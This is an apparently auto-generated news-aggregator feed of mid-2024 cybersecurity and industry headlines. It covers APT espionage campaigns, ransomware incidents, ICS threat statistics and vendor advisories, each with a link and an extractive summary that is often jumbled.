    Autosummary: The second solution, known as “Automotive Security Lifecycle Management,” integrates the Argus XDR threat detection and response product for automotive on Azure with robust security operations and management tools from Microsoft, including Microsoft Sentinel, Defender for Cloud, Defender Threat Intelligence and Azure OpenAI Service. "


    Preventative defense tactics in the real world

    industry
    2024-06-17 https://www.welivesecurity.com/en/business-security/preventative-defense-tactics-real-world/
    Don’t get hacked in the first place – it costs far less than dealing with the aftermath of a successful attack "

    Autosummary: MFA can stop, or at least blunt, brute force attacks, especially Business Email Compromise (BEC), which is a perpetual concern. "


    North Korean Hackers Target Brazilian Fintech with Sophisticated Phishing Tactics

    financial latam industry
    2024-06-14 https://thehackernews.com/2024/06/north-korean-hackers-target-brazilian.html
    Threat actors linked to North Korea have accounted for one-third of all the phishing activity targeting Brazil since 2020, as the country's emergence as an influential power has drawn the attention of cyber espionage groups. "North Korean government-backed actors have targeted the Brazilian government and Brazil's aerospace, technology, and financial services sectors," Google's Mandiant and "

    Autosummary: "Jade Sleet's packages, discovered throughout summer 2023, were designed to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality," Checkmarx researchers Tzachi Zornstein and Yehuda Gelb said. "


    Learn to Secure Petabyte-Scale Data in a Webinar with Industry Titans

    industry
    2024-06-14 https://thehackernews.com/2024/06/learn-to-secure-petabyte-scale-data-in.html
    Data is growing faster than ever. Remember when petabytes (that's 1,000,000 gigabytes!) were only for tech giants? Well, that's so last decade! Today, businesses of all sizes are swimming in petabytes. But this isn't just about storage anymore. This data is ALIVE—it's constantly accessed, analyzed, shared, and even used to train the next wave of AI. This creates a huge challenge: how do you "

    Autosummary: In this must-attend webinar, you'll learn: how to adapt your data security strategies to keep pace with explosive data growth; best practices for managing access control and monitoring in petabyte-scale environments; strategies for mitigating risks associated with third-party data access and data movement; insights into the unique security challenges posed by LLM model training; and future-proofing your data security approach for the era of big data. Whether you're a CISO, security engineer, IT professional, or business leader, if you're responsible for protecting your company's data, this webinar is essential. "


    Preparing for a career in cybersecurity? Check out these statistics

    industry ciber
    2024-06-11 https://www.helpnetsecurity.com/2024/06/11/cybersecurity-jobs-skills-statistics-2024/

    This article includes excerpts from various reports that provide statistics and insights on cybersecurity jobs, skills shortages, and workforce dynamics. Lack of skills and budget slow zero-trust implementation Entrust | 2024 State of Zero Trust & Encryption Study | May 2024 Despite 60% of organizations reporting significant senior leadership support for zero trust, a lack of skills and budget are still cited as the biggest roadblocks to implementing these frameworks, highlighting a discrepancy between support … More

    The post Preparing for a career in cybersecurity? Check out these statistics appeared first on Help Net Security.

    "

    Autosummary: IDC | Enterprise Resilience: IT Skilling Strategies, 2024 | May 2024 IDC predicts that by 2026, more than 90% of organizations worldwide will feel the pain of the IT skills crisis, amounting to some $5.5 trillion in losses caused by product delays, impaired competitiveness, and loss of business. "


    China-Linked ValleyRAT Malware Resurfaces with Advanced Data Theft Tactics

    exploits industry
    2024-06-11 https://thehackernews.com/2024/06/china-linked-valleyrat-malware.html
    Cybersecurity researchers have uncovered an updated version of malware called ValleyRAT that's being distributed as part of a new campaign. "In the latest version, ValleyRAT introduced new commands, such as capturing screenshots, process filtering, forced shutdown, and clearing Windows event logs," Zscaler ThreatLabz researchers Muhammed Irfan V A and Manisha Ramcharan Prajapati said. ValleyRAT "

    Autosummary: Next, the malware launches "WINWORD2013.EXE," a legitimate executable associated with Microsoft Word, using it to sideload "wwlib.dll" that, in turn, establishes persistence on the system and loads "xig.ppt" into memory. "


    Sticky Werewolf targets the aviation industry in Russia and Belarus

    industry
    2024-06-10 https://securityaffairs.com/164345/hacking/sticky-werewolf-targets-aviation-industry.html
    Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. Sticky Werewolf is a threat actor that was first spotted in April 2023, initially targeting public organizations in Russia and Belarus. The group has expanded its operations to various sectors, including a pharmaceutical company and a Russian research institute […] "

    Autosummary: Pierluigi Paganini, June 10, 2024: Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus. "


    APT and financial attacks on industrial organizations in Q1 2024

    financial industry
    2024-06-10 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q1-2024/
    This summary provides an overview of the reports of APT and financial attacks on industrial enterprises, as well as the related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities. "

    Autosummary: According to the CSA, these operations have targeted various industries, including aerospace and defense, education, energy and utilities, governments, hospitality, manufacturing, oil and gas, retail, technology, and transportation. Targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the United Arab Emirates, and the US. According to them, victims are globally distributed, vary greatly in size and span multiple industries, including global government and military departments, national telecommunications companies, defense contractors, aerospace, aviation, engineering, and others. Pawn Storm/Sofacy/APT28 attacks: TrendMicro reported that Pawn Storm (aka APT28, Sofacy, Fancy Bear, Sednit, and Forest Blizzard) launched NTLMv2 hash relay attacks between April 2022 and November 2023 to brute-force its way into government, defense, military, energy and transportation networks worldwide. StrelaStealer attacks: Palo Alto Networks researchers identified a wave of large-scale StrelaStealer campaigns that impacted more than 100 organizations in the EU and US, including manufacturing, utilities and energy, construction, high tech, and other industries. Some of the devices and software compromised by the attackers include Fortinet FortiGuard, PRTG Network Monitor appliances, ManageEngine ADSelfService Plus, FatePipe WARP, Ivanti Connect Secure VPN, and Cisco ASA, according to the Dragos report. So far, RedCurl has carried out more than 40 attacks: half of them in Russia, the rest in the UK, Germany, Canada, Norway, and Ukraine.
    Volt Typhoon CISA alert: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) published joint guidance and an advisory on February 7 focusing on the Chinese-speaking threat actor Volt Typhoon, which infiltrated a critical infrastructure network in the United States and remained undetected for at least five years before being discovered. Attackers send phishing emails in the name of domestic government agencies (Roskomnadzor, Investigative Committee, Military Prosecutor’s Office, court orders, and other regulatory requirements) and trick recipients into launching a malicious file, after which they deliver the White Snake stealer to the victim’s computer. "


    Brazil to ask Argentina to extradite alleged rioters

    latam industry
    2024-06-08 https://www.bbc.com/news/articles/c2vv504qj13o
    The riots were led by supporters of former right-wing President Jair Bolsonaro in January 2023. "

    Autosummary: "


    Australia wants to become a renewable energy superpower. Can it?

    industry
    2024-06-04 https://www.bbc.com/news/articles/cp00vyl6l6mo
    The country has come up with an ambitious plan to become the engine room of the new green economy. "

    Autosummary: Alpha HPA already produces a range of ultra-high purity aluminium materials. “This government has continued to approve new gas and coal projects - it's flown to Japan, India, Korea, and Vietnam to secure long-term markets for gas and coal.” Doing so, the government argues, is a national security priority, as countries examine their trade dependence on Beijing, and look to insulate themselves against supply chain shocks. “It’s a big opportunity for us to be an exporter of climate solutions to the world instead of climate problems,” John Grimes, who heads the Smart Energy Council, says. "


    Q1 2024 – a brief overview of the main incidents in industrial cybersecurity

    industry ciber
    2024-06-03 https://ics-cert.kaspersky.com/publications/q1-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
    A total of 30 incidents were confirmed by victims. 37% of victims reported denial of operations or product shipment caused by the incident. Almost half of all incidents resulted in disruption of the victims’ public digital services. "

    Autosummary: The victims belong to the following industries/sectors: manufacturing (including automotive, aerospace, pharmaceutical, food and beverages, clothing, cosmetics and many other sub-sectors), utility, energy, transportation and logistics, engineering, and mining.
    Electronics: Foxsemicon hit by ransomware | Manufacturing, electronics | Denial of IT services, data leakage, personal data leakage | Ransomware. On January 15, semiconductor equipment manufacturer Foxsemicon Integrated Technology, a subsidiary of Taiwanese electronics giant Foxconn, was the victim of a cyberattack.
    Pharmaceutical: HAL Allergy hit by ransomware | Manufacturing, pharmaceutical | Data leakage, denial of services, product delivery delay | Ransomware. On February 19, Dutch pharmaceutical company HAL Allergy Group was hit by a ransomware attack, according to a statement on its website.
    Veolia hit by ransomware | Water supply, utility | Denial of IT systems, denial of services, personal data leakage | Ransomware. The North American municipal water division of Veolia, a French transnational utility company, experienced a ransomware incident that impacted certain software applications and systems.
    Varta hit by cyberattack | Manufacturing, automotive | Denial of IT systems, denial of operations. Varta, a German manufacturer of batteries for the automotive, industrial and consumer sectors, disclosed that its systems were affected by a cyberattack on February 12.
    Hewlett Packard hit by cyberattack | Manufacturing, electronics | Data leakage | APT. On January 19, Hewlett Packard Enterprise filed a Form 8-K with the US Securities and Exchange Commission (SEC), reporting unauthorized access to the company’s cloud-based email environment by a threat actor believed to be Midnight Blizzard (aka Dukes, CozyBear and NOBELIUM/APT29/BlueBravo).
    The group said it had stolen 110GB of data from Lush, allegedly including many personal documents such as passport scans, and company documents related to accounting, finance, tax, projects, and customers.
    EAS hit by ransomware | Manufacturing, engineering | Data leakage, denial of operations | Ransomware. Dutch mechanical engineering and manufacturing company EAS Europe was the victim of a ransomware attack on February 26, according to a notice on its website.
    Logistics and transportation: GCA hit by cyberattack | Transportation, logistics | Denial of IT services. French transport and logistics company GCA (Groupe Charles André) suffered a cyberattack during the night of February 17-18, resulting in an interruption of its internet access and the disruption of its usual communications, according to a message sent to its customers.
    Muscatine Power and Water hit by ransomware | Water supply, energy, utility | Denial of IT services, personal data leakage | Ransomware. US utility company Muscatine Power and Water (MPW) discovered a cybersecurity incident impacting its corporate network environment.
    Automotive: ThyssenKrupp hit by cyberattack | Manufacturing, automotive | Denial of IT systems, denial of operations. German steelmaker and automotive supplier ThyssenKrupp said in a statement that it suffered a cyberattack that affected its auto body manufacturing division, ThyssenKrupp Automotive Body Solutions.
    The forensic investigation revealed that some current and former customer data, such as address, social security number, driver’s license, etc., may have been compromised in the incident.
    Etesia hit by cyberattack | Manufacturing | Denial of IT systems, services and operations. French mower manufacturer Etesia was the victim of a cyberattack on February 2, according to local press reports, forcing 160 employees to work part-time.
    Radiant Logistics hit by cyberattack | Transportation, logistics | Denial of services. Radiant Logistics, an international freight company, isolated its Canadian operations following a cybersecurity incident. "


    Can "energy hog" hot tubs be greener?

    industry
    2024-06-03 https://www.bbc.com/news/articles/cqllvze3204o
    Hot tubs are becoming a standard feature at holiday parks, but can they be made more energy efficient? "

    Autosummary: This led the company to institute a new hot tub policy, where guests have to pay more to use a hot tub in the summer, or if their hot tub requires a mid-week water change.“In the winter, most guests still want to opt in to the hot tub but increasingly in the summer, more and more guests are opting out,” says Al Judge, the cofounder of AliKats. "


    Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution

    industry
    2024-06-02 https://www.helpnetsecurity.com/2024/06/02/week-in-review-attackers-trying-to-access-check-point-vpns-nist-csf-2-0-security-metrics-evolution/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RansomLord: Open-source anti-ransomware exploit tool RansomLord is an open-source tool that automates the creation of PE files, which are used to exploit ransomware pre-encryption. Attackers are probing Check Point Remote Access VPN devices Attackers are trying to gain access to Check Point VPN devices via local accounts protected only by passwords, the company has warned on Monday. How to combat … More

    The post Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution appeared first on Help Net Security.

    "

    Autosummary: Chronon: Open-source data platform for AI/ML applications Chronon is an open-source, end-to-end feature platform designed for machine learning (ML) teams to build, deploy, manage, and monitor data pipelines for machine learning. "


    Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors

    industry
    2024-05-30 https://thehackernews.com/2024/05/cyber-espionage-alert-lilacsquid.html
    A previously undocumented cyber espionage-focused threat actor named LilacSquid has been linked to targeted attacks spanning various sectors in the United States (U.S.), Europe, and Asia as part of a data theft campaign since at least 2021. "The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to "

    Autosummary: "


    Samsung Electronics union calls first-ever strike

    industry
    2024-05-29 https://www.bbc.com/news/articles/cx7768n6pnpo
    A full-scale strike at the firm could have an impact on the global supply chains of electronics. "

    Autosummary: Samsung Electronics union calls first-ever strike: A union representing thousands of workers at Samsung Electronics has called the first strike at the South Korean technology giant since it was founded five and a half decades ago. "


    The evolution of security metrics for NIST CSF 2.0

    industry
    2024-05-28 https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/

    CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes. Siloed, narrow metrics do have a place in cybersecurity, … More

    The post The evolution of security metrics for NIST CSF 2.0 appeared first on Help Net Security.

    "

    Autosummary: Why CISOs must equally weight metrics and process: Yet, beneath this veneer of certainty lies a complex truth: individual metrics, while helpful, are fundamentally limited in that they only measure singular data points from siloed systems. Siloed metrics don’t tell the whole story: narrow metrics may show the number of vulnerabilities patched but don’t capture root causes, how those vulnerabilities were prioritized, or if the most critical ones were addressed first. To understand why process metrics are a necessary complement to traditional siloed metrics, consider the recent attacks by Chinese and Russian hackers that allowed them to access email accounts of top US government officials and top Microsoft brass, respectively. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. More broadly, a narrow reliance on single data points, not metrics, as part of a more extensive process is dangerous for CISOs. "


    Ransomware operators shift tactics as law enforcement disruptions increase

    exploits industry
    2024-05-27 https://www.helpnetsecurity.com/2024/05/27/ransomware-attacks-surge-video/

    Ransomware remains one of the most pressing cybersecurity threats in 2024, with attackers continually evolving their methods to maximize impact and evade detection. In this Help Net Security round-up, we present excerpts from previously recorded videos featuring cybersecurity experts discussing ransomware-related topics such as payment practices, the recent surge in ransomware attacks, and more. Complete videos Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be … More

    The post Ransomware operators shift tactics as law enforcement disruptions increase appeared first on Help Net Security.

    "

    Autosummary: "


    Threat landscape for industrial automation systems. Q1 2024

    industry
    2024-05-27 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q1-2024/
    In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%. Compared to the first quarter of 2023, the percentage decreased by 1.3 pp. "

    Autosummary: Percentage of ICS computers on which malicious objects were blocked, by category (Q4 2023 | Q1 2024 | change):
    7.61% | 5.84% | -1.77 pp
    Spy Trojans, backdoors and keyloggers | 3.86% | 3.90% | 0.04 pp
    Malicious documents (MSOffice + PDF) | 2.02% | 1.72% | -0.30 pp
    Viruses | 1.48% | 1.56% | 0.08 pp
    Worms | 1.55% | 1.51% | -0.04 pp
    Miners in the form of executable files for Windows | 0.84% | 0.92% | 0.08 pp
    Web miners running in browsers | 0.45% | 0.49% | 0.04 pp
    Malware for AutoCAD | 0.36% | 0.41% | 0.05 pp
    Ransomware | 0.17% | 0.15% | -0.02 pp
    Main threat sources (Q4 2023 | Q1 2024 | change):
    Internet | 13.25% | 12.24% | -1.01 pp
    Email clients | 3.15% | 3.04% | -0.11 pp
    Removable media | 1.29% | 1.13% | -0.16 pp
    Network folders | 0.17% | 0.15% | -0.02 pp
    Statistics across all threats: In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%. This group includes Windows computers that serve one or several of the following purposes: supervisory control and data acquisition (SCADA) servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); OT network administration computers; ICS software development computers. We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context, as can be seen in the charts above. Malicious object categories: Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: malicious objects used for initial infection, next-stage malware, and self-propagating malware. Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents.
    Change in percentage of ICS computers blocked by various categories of malicious objects in Q1 2024: Compared to the previous quarter, in the first quarter of 2024, the most significant increase in the percentage of ICS computers on which malicious objects of various categories were blocked was as follows: AutoCAD malware – by 1.16 times. Percentage of ICS computers on which malicious objects were blocked, by month, 2021–2024: Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 34.2% in Africa to 11.5% in Northern Europe. "


    Threat landscape for industrial automation systems. Regions, Q1 2024

    industry
    2024-05-27 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q1-2024/
    The percentage of ICS computers on which malicious objects were blocked during the quarter varied regionally from 34.2% in Africa to 11.5% in Northern Europe. Africa and South-East Asia saw their percentages increase from the previous quarter. "

    Autosummary: The leading regions by percentage of ICS computers on which threats from these sources were blocked are the following: Internet threats Africa – 14.82% South-East Asia – 14.01% Email threats Southern Europe – 6.85% Latin America – 5.09% Denylisted internet resources The leading regions by percentage of ICS computers on which denylisted internet resources were blocked were: Africa – 8.78% Russia – 7.49% South Asia – 7.48% Malicious scripts and phishing pages The leading regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were: Latin America – 7.23% Southern Europe – 6.96% Middle East – 6.95% Malicious documents The leading regions by percentage of ICS computers on which malicious documents were blocked were: Southern Europe – 3.24% Latin America – 2.94% Eastern Europe – 2.33% Next-stage malware Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. In similar regional rankings, worms are in fourth place in four regions: Africa – 5.29% Central Asia – 2.88% Middle East – 2.40% South Asia – 1.95% The top regions for worms were the leading regions by percentage of ICS computers on which threats were blocked when connecting removable media: Africa – 5.60% South Asia – 2.46% Viruses The leading regions by percentage of ICS computers on which viruses were blocked were: South-East Asia – 7.61% Africa – 4.09% East Asia – 2.89% In South-East Asia, viruses are in first place (!) 
Covert crypto-mining programs Web miners running in browsers The leading regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa – 0.91% Middle East – 0.84% Australia and New Zealand – 0.78% In the regional rankings of threat categories by percentage of ICS computers on which they were blocked, web miners ended up in fifth place regionally (eighth place globally): Australia and New Zealand – 0.78% US and Canada – 0.45% Northern Europe – 0.27% In Q1 2024, the percentage of ICS computers on which web miners running in browsers were blocked increased in all regions except Russia and Central Asia. 20–25% Eastern Europe – 24.7% Russia – 23.6% Latin America – 23.5% South Asia – 23.5% Southern Europe – 21.4% East Asia – 20.3% Up to 20% Australia and New Zealand – 16.2% US and Canada – 13.3% Western Europe – 12.3% Northern Europe – 11.5% The third group contains the regions that are the safest in terms of cybersecurity. The three leading regions by percentage of ICS computers on which spyware was blocked were also the leading regions for malware from the first mentioned group: Africa – 6.65% Middle East – 5.89% Southern Europe – 5.45% In almost all regions, in the threat category rankings by percentage of ICS computers on which it was blocked, spyware does not rank higher than third place, except for two regions: East Asia: in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked, at 3.68%. Compared to the global figures, the region has a significantly higher percentage of ICS computers on which the following was blocked: AutoCAD malware, by 6.8 times Viruses, by 4 times Spyware, by 1.3 times Malicious documents, by 1.3 times Ransomware, by 1.2 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: AutoCAD malware – by 1.4 times Viruses, by 1.2 times Current threats Viruses. 
Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.9 times Spyware, by 1.4 times Malicious scripts and phishing pages, by 1.2 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Miners in the form of executable files for Windows, by 1.7 times Web miners, by 1.6 times. Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Web miners, by 1.5 times Miners in the form of executable files for Windows, by 1.5 times Current threats Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Miners in the form of executable files for Windows Web miners The region is safe overall. South Asia – 2.46% Central Asia – 1.51% Worms The leading regions by percentage of ICS computers on which worms were blocked were: Africa – 5.29% Central Asia – 2.88% Middle East – 2.40% Globally, worms are in sixth place in the threat category ranking by percentage of ICS computers on which they were blocked. Spyware, by 1.5 times Viruses, by 1.5 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Web miners, by 1.3 times Miners in the form of executable files for Windows, by 1.2 times Current threats Ransomware From Q4 2022 through Q3 2023, the Middle East held second place in the regional ranking for this threat category. 
Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.7 times Malicious scripts and phishing pages, by 1.2 times Spyware, by 1.2 times Web miners Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Spyware, by 1.3 times Denylisted internet resources are slowly growing for the second quarter in a row. Covert crypto-mining programs Miners in the form of executable files for Windows The leading regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked were: Central Asia – 1.78% Russia – 1.38% Eastern Europe – 1.06% In the global rankings of threat categories by percentage of ICS computers on which they were blocked, miners in the form of Windows executable files are in seventh place. From a global perspective, it has a significantly higher percentage of ICS computers on which the following was blocked: Worms, by 3.5 times Viruses, by 2.6 times Spyware, by 1.7 times Ransomware, by 1.8 times Web miners, by 1.8 times Worms and viruses outpaced malicious documents in the threat category ranking by percentage of ICS computers on which they were blocked. Miners in the form of executable files for Windows, by 1.6 times AutoCAD malware – by 1.4 times Current threats Malicious scripts and phishing pages Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Web miners Miners in the form of executable files for Windows AutoCAD malware Based on the combination of indicators, the region is safe overall. 
All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups: Over 25% Africa – 32.4% South-East Asia – 29.7% Middle East – 26.9% Central Asia – 26.8% In the regions of this group, ICS cybersecurity requires close attention and improvement. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Viruses, by 1.9 times AutoCAD malware, by 3.6 times Quarterly changes Current threats Spyware Viruses AutoCAD malware It is likely that the active use of spyware by cybercriminals leads to a high percentage of compromised authentication data in industrial enterprise systems, which significantly increases the risks of subsequent targeted attacks. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Ransomware, by 1.9 times Web miners, by 1.7 times Worms, by 1.6 times Worms were fourth in the ranking of malware categories by percentage of ICS computers on which they were blocked (sixth globally). "


    Inside Operation Diplomatic Specter: Chinese APT Group’s Stealthy Tactics Exposed

    industry
    2024-05-23 https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html
    Governmental entities in the Middle East, Africa, and Asia are the target of a Chinese advanced persistent threat (APT) group as part of an ongoing cyber espionage campaign dubbed Operation Diplomatic Specter since at least late 2022. "An analysis of this threat actor’s activity reveals long-term espionage operations against at least seven governmental entities," Palo Alto Networks

    Autosummary: The Chinese links to Operation Diplomatic Specter further stem from the use of operational infrastructure exclusively used by China-nexus groups like APT27, Mustang Panda, and Winnti, not to mention tools like the China Chopper web shell and PlugX. "The exfiltration techniques observed as part of Operation Diplomatic Specter provide a distinct window into the possible strategic objectives of the threat actor behind the attacks," the researchers concluded.


    New Frontiers, Old Tactics: Chinese Espionage Group Targets Africa & Caribbean Govts

    industry
    2024-05-23 https://thehackernews.com/2024/05/new-frontiers-old-tactics-chinese-cyber.html
    The China-linked threat actor known as Sharp Panda has expanded their targeting to include governmental organizations in Africa and the Caribbean as part of an ongoing cyber espionage campaign. "The campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools," Check Point

    Autosummary: The sustained strategic intrusions by Chinese threat actors in Africa against key industrial sectors, such as telecom service providers, financial institutions, and governmental bodies, align with the nation’s technological agenda in the region, tying into its Digital Silk Road (DSR) project announced in 2015.


    Microsoft spots gift card thieves using cyber-espionage tactics

    industry
    2024-05-23 https://www.bleepingcomputer.com/news/security/microsoft-spots-gift-card-thieves-using-cyber-espionage-tactics/
    Microsoft has published a "Cyber Signals" report sharing new information about the hacking group Storm-0539 and a sharp rise in gift card theft as we approach the Memorial Day holiday in the United States. [...]

    Autosummary: SMS phishing sent to targets. Source: Microsoft. Once they gain access to the target environment using stolen accounts, they register their own devices with the company’s multi-factor authentication (MFA) platforms for persistence and then move laterally by compromising virtual machines, VPNs, SharePoint, OneDrive, Salesforce, and Citrix environments.


    Rockwell Advises Disconnecting Internet-Facing ICS Devices Amid Cyber Threats

    industry
    2024-05-22 https://thehackernews.com/2024/05/rockwell-advises-disconnecting-internet.html
    Rockwell Automation is urging its customers to disconnect all industrial control systems (ICSs) not meant to be connected to the public-facing internet to mitigate unauthorized or malicious cyber activity. The company said it’s issuing the advisory due to "heightened geopolitical tensions and adversarial cyber activity globally." To that end, customers are required to take immediate

    Autosummary: "Cyber actors, including advanced persistent threat (APT) groups, have targeted OT/ICS systems in recent years to achieve political gains, economic advantages, and possibly to execute destructive effects," the NSA noted in September 2022.


    Phishing statistics that will make you think twice before clicking

    financial industry
    2024-05-21 https://www.helpnetsecurity.com/2024/05/21/phishing-statistics-2024/

    This article includes excerpts from various reports that offer statistics and insights into the current phishing landscape. AI-driven phishing attacks deceive even the most aware users Zscaler | Zscaler ThreatLabz 2024 Phishing Report | May 2024 In 2023, the United States (55.9%), United Kingdom (5.6%) and India (3.9%) emerged as the top countries targeted by phishing scams. The finance and insurance sector experienced the highest number of overall phishing attempts, amounting to a 393% increase … More

    The post Phishing statistics that will make you think twice before clicking appeared first on Help Net Security.

    Autosummary: Proofpoint | 2024 State of the Phish | February 2024 And while the incidence of successful phishing attacks has slightly declined (71% of surveyed organizations experienced at least one successful attack in 2023 versus 84% the previous year), the negative consequences have soared: a 144% increase in reports of financial penalties, such as regulatory fines, and a 50% increase in reports of reputational damage.


    Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors

    industry
    2024-05-21 https://securityaffairs.com/163489/cyber-crime/blackbasta-claims-atlas-hack.html
    The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States. Atlas is one of the largest national fuel distributors to 49 continental US States with over 1 billion gallons per year. The Blackbasta extortion group added the company to the list of victims on […]

    Autosummary: Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors. Pierluigi Paganini, May 21, 2024. The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States.


    Rockwell Automation warns admins to take ICS devices offline

    industry
    2024-05-21 https://www.bleepingcomputer.com/news/security/rockwell-automation-warns-admins-to-take-ics-devices-offline/
    Rockwell Automation warned customers to disconnect all industrial control systems (ICSs) not designed for online exposure from the Internet due to increasing malicious activity worldwide. [...]

    Autosummary:


    Cybercriminals shift tactics to pressure more victims into paying ransoms

    industry ciber
    2024-05-20 https://www.helpnetsecurity.com/2024/05/20/ransomware-claims-frequency-grow/

    Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay. This was primarily driven by an explosion in “indirect” ransomware incidents which increased by more than 415% in 2023 than in 2022. Standing out among the biggest loss drivers were remote access tools, which accounted for 58% of ransomware attacks. Double leverage attacks – those using both data encryption and exfiltration – … More

    The post Cybercriminals shift tactics to pressure more victims into paying ransoms appeared first on Help Net Security.

    Autosummary: Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay.


    Strata Identity Maverics Identity Continuity provides real-time IDP failover capabilities

    ransomware industry
    2024-05-20 https://www.helpnetsecurity.com/2024/05/20/strata-identity-maverics-identity-continuity/

    Strata Identity announced Maverics Identity Continuity, a new add-on product to its Maverics Identity Orchestration platform that provides always-on identity continuity in multi-cloud environments. Unlike regional redundancy offerings from cloud providers and existing backup and restore products that only shorten the time it takes to rebuild IDP (primary identity provider) infrastructures after an outage, Strata’s Identity Continuity product maintains uninterrupted identity services by autonomously and transparently failing over to an alternate IDP. With many organizations … More

    The post Strata Identity Maverics Identity Continuity provides real-time IDP failover capabilities appeared first on Help Net Security.

    Autosummary: The need for always-on identity. Traditional identity resilience offerings are limited to providing disaster recovery using point-in-time IDP policy configuration backups, but cannot prevent a business’ mission-critical applications from going offline.


    Cuba laments collapse of iconic sugar industry

    industry
    2024-05-18 https://www.bbc.co.uk/news/world-latin-america-68935247
    For centuries, sugar was the mainstay of Cuba’s economy. Now the industry is in rapid decline.

    Autosummary:


    Too many ICS assets are exposed to the public internet

    industry
    2024-05-17 https://www.helpnetsecurity.com/2024/05/17/organizations-expanding-attack-surface/

    The enterprise attack surface is expanding in multiple ways, becoming more numerous and more specific, according to runZero. “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO. IT and OT are converging, expanding the attack surface of organizations and requiring new techniques to discover and manage assets. … More

    The post Too many ICS assets are exposed to the public internet appeared first on Help Net Security.

    Autosummary: “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO.


    Ransomware statistics that reveal alarming rate of cyber extortion

    exploits industry
    2024-05-15 https://www.helpnetsecurity.com/2024/05/15/ransomware-statistics-2024/

    In this article, you will find excerpts from various reports that offer statistics and insights about the current ransomware landscape. Global ransomware crisis worsens NTT Security Holdings | 2024 Global Threat Intelligence Report | May 2024 Ransomware and extortion incidents surged by 67% in 2023 Manufacturing topped the list of attack sectors in 2023 at 25.66% and had the most ransomware victims posted on social channels with 27.75%. Ransomware attacks impact 20% of sensitive data … More

    The post Ransomware statistics that reveal alarming rate of cyber extortion appeared first on Help Net Security.

    Autosummary: According to the data, 1,075 leak site ransomware victims were posted on leak sites during the first quarter of 2024, despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22% and 8% of the activity, respectively.


    Tailoring responsible AI: Defining ethical guidelines for industry-specific use

    industry
    2024-05-14 https://www.helpnetsecurity.com/2024/05/14/chris-peake-smartsheet-responsible-ai/

